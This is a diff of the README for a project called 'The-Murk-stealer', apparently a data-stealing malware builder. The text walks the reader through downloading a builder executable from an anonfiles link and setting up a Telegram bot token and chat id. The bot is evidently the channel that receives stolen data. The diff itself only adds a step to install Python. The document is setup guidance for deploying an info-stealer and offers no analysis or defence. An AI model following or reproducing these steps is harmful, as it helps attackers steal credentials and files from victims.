Choomai/The-Murk-stealer/README.md

 ---
 ### 🔨Builder

-__Firstly you have to download all files from [github](#up).Then you need to download the builder [here](https://anonfiles.com/6eGflcW8y8/TheMurkBuilder_exe) (the builder weighs more than 25 mb, so I can't post it on github) and place in in one folder with previous files.
+__So firstly you need to download [python](https://www.python.org/downloads/).
+Secondly you have to download all files from [github](#up).Then you need to download the builder [here](https://anonfiles.com/6eGflcW8y8/TheMurkBuilder_exe) (the builder weighs more than 25 mb, so I can't post it on github) and place in in one folder with previous files.
 Finaly go to the "https://t.me/BotFather" and create your own bot.
 You need to save token and bot name.
 Now you need to get your chat id.
 To do this, go to the next bot "https://t.me/TgramUserIDBot" and save the id.
 Insert this data in builder__